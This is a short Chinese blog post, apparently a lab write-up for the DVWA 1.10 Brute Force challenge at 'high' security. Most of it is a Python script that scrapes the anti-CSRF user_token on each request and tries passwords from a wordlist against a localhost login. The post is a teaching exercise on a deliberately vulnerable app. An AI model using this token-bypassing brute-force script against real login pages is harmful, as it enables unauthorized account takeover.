DVWA 1.10版本Brute Force（high）

最新推荐文章于 2025-03-12 09:51:07 发布

monsterdouble

最新推荐文章于 2025-03-12 09:51:07 发布

阅读量798

点赞数

本文链接：https://blog.youkuaiyun.com/monsterdouble/article/details/80803196

版权

low和mid等级直接使用burpsuite暴力破解，high等级先抓包发现有token认证机制，需要先获取token，然后用token加上用户密码验证身份。

以下为python暴力破解代码

import re
import requests


url='http://127.0.0.1:8000/vulnerabilities/brute/'
header={'Host': '127.0.0.1:8000',
	'Upgrade-Insecure-Requests': '1',
	'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36',
	'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
	'Referer': 'http://127.0.0.1:8000/vulnerabilities/brute/',
	'Accept-Encoding': 'gzip, deflate',
	'Accept-Language': 'zh-CN,zh;q=0.9',
	'Cookie': 'csrftoken=ZFWiZJoWLGvU2CzqD2HSwGBzK79Fqrr8tDrSQAi2I3NIEpGxCcEq4IXsxxX6rzy3; PHPSESSID=t9bisbu48jq5b9cllf5ge5u8f6; security=high'}
txt=open('zd.txt')
line=txt.readline()
while line:
	password=line.strip()
	res=requests.get(url,headers=header)
	a=''
	a=res.content
	m="'user_token' value='(.*?)'"
	n=re.findall(r"'user_token' value='(.*?)'",a)
	if n:
		user_token=n[0]
	new_url=url+'?username=admin&password='+password+'&user_token='+user_token+'&Login=Login'
	res=requests.get(new_url,headers=header)
	if 'Username and/or password incorrect.' in res.content:
		print('Password %s is incorrect' %password)
	else:
		print('Password %s is correct' %password)
		break
	line = txt.readline()